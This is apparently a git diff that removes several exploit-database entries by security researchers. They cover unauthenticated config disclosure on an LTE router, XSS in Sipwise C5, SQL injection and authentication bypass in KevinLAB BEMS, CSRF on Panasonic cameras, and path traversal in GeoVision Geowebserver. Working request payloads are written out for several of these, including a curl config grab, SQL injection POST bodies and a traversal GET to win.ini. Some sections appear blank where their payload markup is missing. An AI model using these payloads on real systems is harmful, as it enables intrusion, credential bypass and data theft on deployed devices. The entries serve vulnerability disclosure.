- AM3410V | 2.0.0B1085
- AM3300V | 2.0.0B1060
- AM3100E | 2.0.0B981
- AM3100V | 2.0.0B946
- AM3000M | 2.0.0B21
- KZ7621U | 2.0.0B14
- KZ3220M | 2.0.0B04
- KZ3120R | 2.0.0B01
-
-Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
-& VoIP CPE product specially designed to enable quick and easy
-LTE fixed data service deployment for residential and SOHO customers.
-It provides high speed LAN, Wi-Fi and VoIP integrated services
-to end users who need both bandwidth and multi-media data service
-in residential homes or enterprises. The device has 2 Gigabit LAN
-ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
-CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
-and firewall software for security. It provides an effective
-all-in-one solution to SOHO or residential customers. It can
-deliver up to 1Gbps max data throughput which can be very
-competitive to wired broadband access service.
-
-Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
-when direct object reference is made to the export_settings.cgi file
-using an HTTP GET request. This will enable the attacker to disclose
-sensitive information and help her in authentication bypass, privilege
-escalation and full system access.
-
-Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
- Linux 2.6.36+ (mips)
- Mediatek APSoC SDK v4.3.1.0
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5644
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
-
-
-03.02.2021
-
---
-
-
-$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
-8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49800.html b/exploits/hardware/webapps/49800.html
deleted file mode 100644
index 041cb570b..000000000
--- a/exploits/hardware/webapps/49800.html
+++ /dev/null
@@ -1,112 +0,0 @@
-# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
-# Date: 13.04.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: https://www.sipwise.com
-
-Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
-
-
-Vendor: Sipwise GmbH
-Product web page: https://www.sipwise.com
-Affected version: <=CE_m39.3.1
- NGCP www_admin version 3.6.7
-
-Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
-is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
-rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
-conferencing etc.) that can be configured by end users in the self-care web interface.
-For operators, it offers a web-based administrative panel that allows them to configure
-subscribers, SIP peerings, billing profiles, and other entities. The administrative web
-panel also shows the real-time statistics for the whole system. For tight integration
-into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
-
-Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
-cross-site scripting vulnerabilities when input passed via several parameters to several
-scripts is not properly sanitized before being returned to the user. This can be exploited
-to execute arbitrary HTML and script code in a user's browser session in context of an
-affected site.
-
-Tested on: Apache/2.2.22 (Debian)
- Apache/2.2.16 (Debian)
- nginx
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5648
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php
-
-
-13.04.2021
-
---
-
-
-Stored XSS (POST tsetname):
----------------------------
-
-
-
-
-
-
-
-
-Stored XSS (POST firstname, lastname, company):
------------------------------------------------
-
-
-
-
-
-
-
-
-Reflected XSS (GET lang):
--------------------------
-
-
-
-
-
-
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt
deleted file mode 100644
index b4ae9538b..000000000
--- a/exploits/hardware/webapps/50146.txt
+++ /dev/null
@@ -1,62 +0,0 @@
-# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
-# Date: 05.07.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: http://www.kevinlab.com
-
-Vendor: KevinLAB Inc.
-Product web page: http://www.kevinlab.com
-Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
-
-Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
-management platform. KevinLAB's BEMS (Building Energy Management System) enables
-efficient energy management in buildings. It improves the efficient of energy use
-by collecting and analyzing various information of energy usage and facilities in
-the building. It also manages energy usage, facility efficiency and indoor environment
-control.
-
-Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
-Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
-sanitised before being returned to the user or used in SQL queries. This can be exploited
-to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
-mechanism.
-
-Tested on: Linux CentOS 7
- Apache 2.4.6
- Python 2.7.5
- PHP 5.4.16
- MariaDB 5.5.68
-
-
-Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- @zeroscience
-
-
-Advisory ID: ZSL-2021-5655
-Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
-
-
-05.07.2021
-
---
-
-
-PoC POST data payload (extract):
---------------------------------
-
-POST /http/index.php HTTP/1.1
-Host: 192.168.1.3
-
-requester=login
-request=login
-params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
-
-
-PoC POST data payload (authbypass):
------------------------------------
-
-POST /http/index.php HTTP/1.1
-Host: 192.168.1.3
-
-requester=login
-request=login
-params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50172.txt b/exploits/hardware/webapps/50172.txt
deleted file mode 100644
index 54042d3ff..000000000
--- a/exploits/hardware/webapps/50172.txt
+++ /dev/null
@@ -1,79 +0,0 @@
-# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
-# Date: 13.07.2021
-# Exploit Author: LiquidWorm
-# Vendor Homepage: https://www.panasonic.com
-
-
-
-
- [CSRF]
-[Anonymous user log in = ON]
-orororororororororororororor
- [Change admin password]
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt
deleted file mode 100644
index ac43f9743..000000000
--- a/exploits/hardware/webapps/50211.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
-# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
-# Date: 6-16-21 (Vendor Notified)
-# Exploit Author: Ken 's1ngular1ty' Pyle
-# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
-# Version: <= 5.3.3
-# Tested on: Windows 20XX / MULTIPLE
-# CVE : https://www.geovision.com.tw/cyber_security.php
-
-GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
-
-Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
-
-GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=